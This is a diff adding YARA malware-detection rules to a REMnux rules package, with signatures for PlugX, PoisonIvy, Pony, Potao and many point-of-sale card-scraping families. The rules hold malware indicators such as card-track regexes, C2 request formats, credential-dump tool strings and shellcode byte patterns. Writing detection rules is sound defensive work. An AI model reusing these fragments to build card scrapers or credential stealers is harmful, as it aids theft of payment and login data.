+        $binary2 = { 55 8B EC 51 56 C7 45 FC 00 00 00 00 EB 09 8B 45 FC 83 C0 01 89 45 FC 81 7D FC ?? ?? 00 00 7D 3D 8B 4D FC 0F BE 89 ?? ?? ?? 00 8B 45 FC 33 D2 BE 04 00 00 00 F7 F6 B8 03 00 00 00 2B C2 0F BE 90 ?? ?? ?? 00 33 CA 2B 4D FC 83 E9 01 81 E1 FF 00 00 00 8B 45 FC 88 88 ?? ?? ?? 00 EB B1 5E 8B E5 5D C3}
+    condition:
+        ($mz at 0) and any of ($binary*)
+}
+private rule PotaoSecondStage
+{
+    strings:
+        $mz = { 4d 5a }
+        // hash of CryptBinaryToStringA and CryptStringToBinaryA
+        $binary1 = {51 7A BB 85 [10-180] E8 47 D2 A8}
+        // old hash of CryptBinaryToStringA and CryptStringToBinaryA
+        $binary2 = {5F 21 63 DD [10-30] EC FD 33 02}
+        $binary3 = {CA 77 67 57 [10-30] BA 08 20 7A}
+        
+        $str1 = "?AVCrypt32Import@@"
+        $str2 = "%.5llx"
+    condition:
+        ($mz at 0) and any of ($binary*) and any of ($str*)
+}
+rule Potao
+{
+    meta:
+        Author      = "Anton Cherepanov"
+        Date        = "2015/07/29"
+        Description = "Operation Potao"
+        Reference   = "http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf"
+        Source = "https://github.com/eset/malware-ioc/"
+        Contact = "threatintel@eset.com"
+        License = "BSD 2-Clause"
+    condition:
+        PotaoDecoy or PotaoDll or PotaoUSB or PotaoSecondStage
+}
diff -Nru remnux-rules-0.0.3/yara/malware/PE_File_pyinstaller.yar remnux-rules-0.0.4/yara/malware/PE_File_pyinstaller.yar
--- remnux-rules-0.0.3/yara/malware/PE_File_pyinstaller.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/PE_File_pyinstaller.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+import "pe"
+
+rule PE_File_pyinstaller
+{
+    meta:
+        author = "Didier Stevens (https://DidierStevens.com)"
+        description = "Detect PE file produced by pyinstaller"
+    strings:
+        $a = "pyi-windows-manifest-filename"
+    condition:
+        pe.number_of_resources > 0 and $a
+}
diff -Nru remnux-rules-0.0.3/yara/malware/PittyTiger.yar remnux-rules-0.0.4/yara/malware/PittyTiger.yar
--- remnux-rules-0.0.3/yara/malware/PittyTiger.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/PittyTiger.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+rule PittyTiger {
+  meta: 
+    author = " (@chort0)"
+    description = "Detect PittyTiger Trojan via common strings"
+    strings: 
+      $ptUserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)" // missing minor digit
+      $ptFC001 = "FC001" fullword 
+      $ptPittyTiger = "PittyTiger" fullword 
+      $trjHTMLerr = "trj:HTML Err." nocase fullword 
+      $trjworkFunc = "trj:workFunc start." nocase fullword 
+      $trjcmdtout = "trj:cmd time out." nocase fullword 
+      $trjThrtout = "trj:Thread time out." nocase fullword
+      $trjCrPTdone = "trj:Create PT done." nocase fullword
+      $trjCrPTerr = "trj:Create PT error: mutex already exists." nocase fullword 
+      $oddPippeFailed = "Create Pippe Failed!" fullword // extra 'p'
+      $oddXferingFile = "Transfering File" fullword // missing 'r' 
+      $oddParasError = "put Paras Error:" fullword // abbreviated 'parameters'? 
+      $oddCmdTOutkilled = "Cmd Time Out..Cmd has been killed." fullword 
+condition: 
+  (any of ($pt*)) and (any of ($trj*)) and (any of ($odd*)) 
+  }
diff -Nru remnux-rules-0.0.3/yara/malware/PlugX.yar remnux-rules-0.0.4/yara/malware/PlugX.yar
--- remnux-rules-0.0.3/yara/malware/PlugX.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/PlugX.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PlugXStrings : PlugX Family
+{
+    meta:
+        description = "PlugX Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-12"
+        
+    strings:
+        $BootLDR = "boot.ldr" wide ascii
+        $Dwork = "d:\\work" nocase
+        $Plug25 = "plug2.5"
+        $Plug30 = "Plug3.0"
+        $Shell6 = "Shell6"
+      
+    condition:
+        $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
+}
+
+rule plugX : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "PlugX RAT"
+		date = "2014-05-13"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
+		
+	strings:
+		$v1a = { 47 55 4C 50 00 00 00 00 }
+		$v1b = "/update?id=%8.8x" 
+		$v1algoa = { BB 33 33 33 33 2B } 
+		$v1algob = { BB 44 44 44 44 2B } 
+		$v2a = "Proxy-Auth:" 
+		$v2b = { 68 A0 02 00 00 } 
+		$v2k = { C1 8F 3A 71 } 
+		
+	condition: 
+		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/PoisonIvy.yar remnux-rules-0.0.4/yara/malware/PoisonIvy.yar
--- remnux-rules-0.0.3/yara/malware/PoisonIvy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/PoisonIvy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,72 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule poisonivy_1 : rat
+{
+	meta:
+		description = "Poison Ivy"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
+
+	strings:
+		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } 
+		
+	condition:
+		$a
+}
+
+rule PoisonIvy_Generic_3 {
+	meta:
+		description = "PoisonIvy RAT Generic Rule"
+		author = "Florian Roth"
+		date = "2015-05-14"
+		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"
+	strings:
+		$k1 = "Tiger324{" fullword ascii
+		
+		$s2 = "WININET.dll" fullword ascii
+		$s3 = "mscoree.dll" fullword wide
+		$s4 = "WS2_32.dll" fullword
+		$s5 = "Explorer.exe" fullword wide
+		$s6 = "USER32.DLL"
+		$s7 = "CONOUT$"
+		$s8 = "login.asp"
+		
+		$h1 = "HTTP/1.0"
+		$h2 = "POST"
+		$h3 = "login.asp"
+		$h4 = "check.asp"
+		$h5 = "result.asp"
+		$h6 = "upload.asp"
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and
+			( 
+				$k1 or all of ($s*) or all of ($h*)
+			)
+}
+rule PoisonIvy_2
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/PoisonIvy"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+    strings:
+    	$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
+        $string1 = "CONNECT %s:%i HTTP/1.0"
+        $string2 = "ws2_32"
+        $string3 = "cks=u"
+        $string4 = "thj@h"
+        $string5 = "advpack"
+    condition:
+		$stub at 0x1620 and all of ($string*) or (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/ponmocup_plugin_memory.yar remnux-rules-0.0.4/yara/malware/ponmocup_plugin_memory.yar
--- remnux-rules-0.0.3/yara/malware/ponmocup_plugin_memory.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/ponmocup_plugin_memory.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,58 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+rule Ponmocup : plugins 
+{
+ 			meta: 
+ 					description = "Ponmocup plugin detection (memory)"
+ 					author = "Danny Heppener, Fox-IT"
+ 					reference = "https://foxitsecurity.files.wordpress.com/2015/12/foxit-whitepaper_ponmocup_1_1.pdf"
+ 			strings:
+					 $1100 = {4D 5A 90 [29] 4C 04}
+					 $1201 = {4D 5A 90 [29] B1 04}
+					 $1300 = {4D 5A 90 [29] 14 05}
+					 $1350 = {4D 5A 90 [29] 46 05}
+					 $1400 = {4D 5A 90 [29] 78 05}
+					 $1402 = {4D 5A 90 [29] 7A 05}
+					 $1403 = {4D 5A 90 [29] 7B 05}
+					 $1404 = {4D 5A 90 [29] 7C 05}
+					 $1405 = {4D 5A 90 [29] 7D 05}
+					 $1406 = {4D 5A 90 [29] 7E 05}
+					 $1500 = {4D 5A 90 [29] DC 05}
+					 $1501 = {4D 5A 90 [29] DD 05}
+					 $1502 = {4D 5A 90 [29] DE 05}
+					 $1505 = {4D 5A 90 [29] E1 05}
+					 $1506 = {4D 5A 90 [29] E2 05}
+					 $1507 = {4D 5A 90 [29] E3 05}
+					 $1508 = {4D 5A 90 [29] E4 05}
+					 $1509 = {4D 5A 90 [29] E5 05}
+					 $1510 = {4D 5A 90 [29] E6 05}
+					 $1511 = {4D 5A 90 [29] E7 05}
+					 $1512 = {4D 5A 90 [29] E8 05}
+					 $1600 = {4D 5A 90 [29] 40 06}
+					 $1601 = {4D 5A 90 [29] 41 06}
+					 $1700 = {4D 5A 90 [29] A4 06}
+					 $1800 = {4D 5A 90 [29] 08 07}
+					 $1801 = {4D 5A 90 [29] 09 07}
+					 $1802 = {4D 5A 90 [29] 0A 07}
+					 $1803 = {4D 5A 90 [29] 0B 07}
+					 $2001 = {4D 5A 90 [29] D1 07}
+					 $2002 = {4D 5A 90 [29] D2 07}
+					 $2003 = {4D 5A 90 [29] D3 07}
+					 $2004 = {4D 5A 90 [29] D4 07}
+					 $2500 = {4D 5A 90 [29] C4 09}
+					 $2501 = {4D 5A 90 [29] C5 09}
+					 $2550 = {4D 5A 90 [29] F6 09}
+					 $2600 = {4D 5A 90 [29] 28 0A}
+					 $2610 = {4D 5A 90 [29] 32 0A}
+					 $2700 = {4D 5A 90 [29] 8C 0A}
+					 $2701 = {4D 5A 90 [29] 8D 0A}
+					 $2750 = {4D 5A 90 [29] BE 0A}
+					 $2760 = {4D 5A 90 [29] C8 0A}
+					 $2810 = {4D 5A 90 [29] FA 0A}
+ 			condition:
+ 					 any of ($1100,$1201,$1300,$1350,$1400,$1402,$1403,$1404,$1405,$1406,
+$1500,$1501,$1502,$1505,$1506,$1507,$1508,$1509,$1510,$1511,$1512,$1600,$1601,$1700,$1800,$1801,
+$1802,$1803,$2001,$2002,$2003,$2004,$2500,$2501,$2550,$2600,$2610,$2700,$2701,$2750,$2760,$2810)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Pony.yar remnux-rules-0.0.4/yara/malware/Pony.yar
--- remnux-rules-0.0.3/yara/malware/Pony.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Pony.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+rule pony {
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-08-16"
+        description = "Identify Pony"
+	strings:
+    	$s1 = "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}"
+    	$s2 = "YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0"
+    	$s3 = "POST %s HTTP/1.0"
+    	$s4 = "Accept-Encoding: identity, *;q=0"
+
+    	//$useragent1 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
+    	//$useragent2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
+    condition:
+        $s1 and $s2 and $s3 and $s4
+}
diff -Nru remnux-rules-0.0.3/yara/malware/POS_bernhardPos.yar remnux-rules-0.0.4/yara/malware/POS_bernhardPos.yar
--- remnux-rules-0.0.3/yara/malware/POS_bernhardPos.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/POS_bernhardPos.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule BernhardPOS {
+     meta:
+          author = "Nick Hoffman / Jeremy Humble"
+          last_update = "2015-07-14"
+          source = "Morphick Inc."
+          description = "BernhardPOS Credit Card dumping tool"
+          reference = "http://morphick.com/blog/2015/7/14/bernhardpos-new-pos-malware-discovered-by-morphick"
+          md5 = "e49820ef02ba5308ff84e4c8c12e7c3d"
+          score = 70
+     strings:
+          $shellcode_kernel32_with_junk_code = { 33 c0 83 ?? ?? 83 ?? ?? 64 a1 30 00 00 00 83 ?? ?? 83 ?? ?? 8b 40 0c 83 ?? ?? 83 ?? ?? 8b 40 14 83 ?? ?? 83 ?? ?? 8b 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b 00 83 ?? ?? 83 ?? ?? 8b 40 10 83 ?? ?? }
+          $mutex_name = "OPSEC_BERNHARD" 
+          $build_path = "C:\\bernhard\\Debug\\bernhard.pdb" 
+          $string_decode_routine = { 55 8b ec 83 ec 50 53 56 57 a1 ?? ?? ?? ?? 89 45 f8 66 8b 0d ?? ?? ?? ?? 66 89 4d fc 8a 15 ?? ?? ?? ?? 88 55 fe 8d 45 f8 50 ff ?? ?? ?? ?? ?? 89 45 f0 c7 45 f4 00 00 00 00 ?? ?? 8b 45 f4 83 c0 01 89 45 f4 8b 45 08 50 ff ?? ?? ?? ?? ?? 39 45 f4 ?? ?? 8b 45 08 03 45 f4 0f be 08 8b 45 f4 99 f7 7d f0 0f be 54 15 f8 33 ca 8b 45 08 03 45 f4 88 08 ?? ?? 5f 5e 5b 8b e5 5d }
+     condition:
+          any of them
+ }
diff -Nru remnux-rules-0.0.3/yara/malware/POS_Easterjack.yar remnux-rules-0.0.4/yara/malware/POS_Easterjack.yar
--- remnux-rules-0.0.3/yara/malware/POS_Easterjack.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/POS_Easterjack.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule easterjackpos {
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-09-02"
+        description = "Identify JackPOS"
+	strings:
+	    $s1 = "updateinterval="
+        $s2 = "cardinterval="
+        $s3 = "{[!17!]}{[!18!]}"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/POS_LogPOS.yar remnux-rules-0.0.4/yara/malware/POS_LogPOS.yar
--- remnux-rules-0.0.3/yara/malware/POS_LogPOS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/POS_LogPOS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule LogPOS
+{
+    meta:
+        author = "Morphick Security"
+        description = "Detects Versions of LogPOS"
+        md5 = "af13e7583ed1b27c4ae219e344a37e2b"
+    strings:
+        $mailslot = "\\\\.\\mailslot\\LogCC"
+        $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
+        //64A130000000      mov eax, dword ptr fs:[0x30]
+        //8B400C        mov eax, dword ptr [eax + 0xc]
+        //8B401C        mov eax, dword ptr [eax + 0x1c]
+        //8B4008        mov eax, dword ptr [eax + 8]
+        $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
+    condition:
+        $sc and 1 of ($mailslot,$get)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/POS_MalumPOS.yar remnux-rules-0.0.4/yara/malware/POS_MalumPOS.yar
--- remnux-rules-0.0.3/yara/malware/POS_MalumPOS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/POS_MalumPOS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PoS_Malware_MalumPOS
+{
+    meta:
+        author = "Trend Micro, Inc."
+        date = "2015-05-25"
+        description = "Used to detect MalumPOS memory dumper"
+        sample_filtype = "exe"
+    strings:
+        $string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
+        $string2 = "B)[0-9]{13,19}\\"
+        $string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
+        $string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
+        $string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/ 
+    condition:
+        all of ($string*)
+}        
diff -Nru remnux-rules-0.0.3/yara/malware/POS.yar remnux-rules-0.0.4/yara/malware/POS.yar
--- remnux-rules-0.0.3/yara/malware/POS.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/POS.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,414 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+// Point of Sale (POS) Malware and Tools used during POS compromises
+
+rule blackpos_v2
+{
+meta:
+	author = "@patrickrolsen"
+	version = "0.1"
+	reference = "http://blog.nuix.com/2014/09/08/blackpos-v2-new-variant-or-different-family"
+strings:
+	$s1 = "Usage: -[start|stop|install|uninstall"
+	$s2 = "\\SYSTEM32\\sc.exe config LanmanWorkstation"
+	$s3 = "t.bat"
+	$s4 = "mcfmisvc"
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule dump_tool
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Related to pwdump6 and fgdump tools"
+strings:
+	$s1 = "lsremora"
+	$s2 = "servpw"
+	$s3 = "failed: %d"
+	$s4 = "fgdump"
+	$s5 = "fgexec"
+	$s6 = "fgexecpipe"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule osql_tool
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "O/I SQL - SQL query tool"
+	filetype = "EXE"
+	version = "0.1"
+	date = "1/30/2014"
+strings:
+	$s1 = "osql\\src"
+	$s2 = "OSQLUSER"
+	$s3 = "OSQLPASSWORD"
+	$s4 = "OSQLSERVER"
+condition:
+	uint16(0) == 0x5A4D and (all of ($s*))
+}
+
+rule misc_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS Malware"
+strings:
+	$s1 = "KAPTOXA"
+	$s2 = "cmd /c net start %s"
+	$s3 = "pid:"
+	$s4 = "%ADD%"
+	$s5 = "COMSPEC"
+	$s6 = "KARTOXA"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule unknown
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Unknown POS"
+strings:
+	$s1 = "a.exe" wide
+	$s2 = "Can anyone test" wide
+	$s3 = "I m in computer class now" wide
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule regex_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS malware - Regex"
+strings:
+	$n1 = "REGEXEND" nocase
+	$n2 = "RegExpr" nocase
+	$n3 = "regex"
+	$s4 = "[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+	$s5 = "[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+	$s6 = "(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+	$s7 = "(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+	$s8 = "(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+	$s9 = "([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})"
+	$s10 = "((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})"
+	$s11 = "[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*"
+	$s12 = "\\d{15,19}=\\d{13,}"
+	$s13 = "\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??"
+	$s14 = "[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*"
+condition:
+	uint16(0) == 0x5A4D and 1 of ($n*) and 1 of ($s*)
+}
+
+rule regexpr_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS malware - RegExpr"
+strings:
+	$s1 = "RegExpr" nocase
+	$s2 = "Data.txt"
+	$s3 = "Track1"
+	$s4 = "Track2"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule reg_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS malware - RegExpr"
+strings:
+	$s1 = "T1_FOUND: %s"
+	$s2 = "id=%s&log=%s"
+	$s3 = "\\d{15,19}=\\d{13,}"
+condition:
+	uint16(0) == 0x5A4D and 2 of ($s*)
+}
+
+rule sets_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS malware - Sets"
+strings:
+	$s1 = "GET /sets.txt"
+condition:
+	uint16(0) == 0x5A4D and $s1
+}
+
+rule monitor_tool_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS malware - Monitoring Tool??"
+strings:
+	$s1 = "RCPT TO"
+	$s2 = "MAIL FROM"
+	$s3 = "AUTH LOGIN"
+	$s4 = "Reply-To"
+	$s5 = "X-Mailer"
+	$s6 = "crypto"
+	$s7 = "test335.txt" wide
+	$s8 = "/c del"
+condition:
+	uint16(0) == 0x5A4D and 7 of ($s*)
+}
+
+rule pstgdump
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "pstgdump"
+strings:
+	$s1 = "fgdump\\pstgdump"
+	$s2 = "pstgdump"
+	$s3 = "Outlook"
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule keyfinder_tool
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Magical Jelly Bean KeyFinder"
+strings:
+	$s1 = "chgxp.vbs"
+	$s2 = "officekey.exe"
+	$s3 = "findkey.exe"
+	$s4 = "xpkey.exe"
+condition:
+	uint16(0) == 0x5A4D and 2 of ($s*)
+}
+
+rule memdump_diablo
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Process Memory Dumper - DiabloHorn"
+strings:
+	$s1 = "DiabloHorn"
+	$s2 = "Process Memory Dumper"
+	$s3 = "pid-%s.dmp"
+	$s4 = "Pid %d in not acessible" // SIC
+	$s5 = "memdump.exe"
+	$s6 = "%s-%d.dmp"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule blazingtools
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Blazing Tools - http://www.blazingtools.com (Keyloggers)"
+strings:
+	$s1 = "blazingtools.com"
+	$s2 = "Keystrokes" wide
+	$s3 = "Screenshots" wide
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule sysocmgr
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "System stand-alone Optional Component Manager - http://support.microsoft.com/kb/222444"
+strings:
+	$s1 = "SYSOCMGR.EXE" wide
+	$s2 = "System stand-alone Optional Component Manager" wide
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule lacy_keylogger
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Appears to be a form of keylogger."
+strings:
+	$s1 = "Lacy.exe" wide
+	$s2 = "Bldg Chive Duel Rip Query" wide
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule searchinject
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "Usage: SearchInject <PID1>[PID2][PID3] - It loads Searcher.dll (appears to be hard coded)"
+strings:
+	$s1 = "SearchInject"
+	$s2 = "inject base:"
+	$s3 = "Searcher.dll" nocase
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule heistenberg_pos
+{
+meta:
+	author = "@patrickrolsen"
+	reference = "POS Malware"
+strings:
+	$s1 = "KARTOXA"
+	$s2 = "dmpz.log"
+	$s3 = "/api/process.php?xy="
+	$s4 = "User-Agent: PCICompliant" // PCICompliant/3.33
+	$s6 = "%s:*:Enabled:%s"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule pos_jack
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Point of Sale (POS) Malware"
+	version = "0.1"
+	reference = "http://blog.spiderlabs.com/2014/02/jackpos-the-house-always-wins.html"
+	date = "2/22/2014"
+strings:
+	$pdb1 = "\\ziedpirate.ziedpirate-PC\\"
+	$pdb2 = "\\sop\\sop\\"
+condition:
+	uint16(0) == 0x5A4D and 1 of ($pdb*)
+}
+
+rule pos_memory_scrapper_
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Point of Sale (POS) Malware Memory Scraper"
+	version = "0.3"
+	description = "POS Memory Scraper"
+	date = "01/30/2014"
+strings:
+	$s1 = "kartoxa" nocase
+	$s2 = "CC2 region:"
+	$s3 = "CC memregion:"
+	$s4 = "target pid:"
+	$s5 = "scan all processes:"
+	$s6 = "<pid> <PATTERN>"
+	$s7 = "KAPTOXA"
+	$s8 = "ATTERN"
+	$s9 = "\\svhst%p"
+condition:
+	uint16(0) == 0x5A4D and 3 of ($s*)
+}
+
+rule pos_malwre_dexter_stardust
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Dexter Malware - StarDust Variant"
+	version = "0.1"
+	description = "Table 2 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
+	reference = "16b596de4c0e4d2acdfdd6632c80c070, 2afaa709ef5260184cbda8b521b076e1, and e3dd1dc82ddcfaf410372ae7e6b2f658"
+	date = "12/30/2013"
+strings:
+	$s1 = "ceh_3\\.\\ceh_4\\..\\ceh_6"
+	$s2 = "Yatoed3fe3rex23030am39497403"
+	$s3 = "Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19"
+	$s4 = "CommonFile.exe"
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+    
+rule pos_malware_project_hook
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Project Hook"
+	version = "0.1"
+	description = "Table 1 arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf"
+	reference = "759154d20849a25315c4970fe37eac59"
+	date = "12/30/2013"
+strings:
+	$s1 = "CallImage.exe"
+	$s2 = "BurpSwim"
+	$s3 = "Work\\Project\\Load"
+	$s4 = "WortHisnal"
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
+rule pdb_strings_Rescator
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Target Attack"
+	version = "0.3"
+	description = "Rescator PDB strings within binaries"
+	date = "01/30/2014"
+strings:
+	$pdb1 = "\\Projects\\Rescator" nocase
+condition:
+	uint16(0) == 0x5A4D and $pdb1
+}
+
+rule pos_uploader
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Point of Sale (POS) Malware"
+    reference = "http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware"
+	version = "0.1"
+	description = "Testing the base64 encoded file in sys32"
+	date = "01/30/2014"
+strings:
+	$s1 = "cmd /c net start %s"
+	$s2 = "ftp -s:%s"
+	$s3 = "data_%d_%d_%d_%d_%d.txt"
+	$s4 = "\\uploader\\"
+condition:
+	uint16(0) == 0x5A4D and all of ($s*)
+}
+
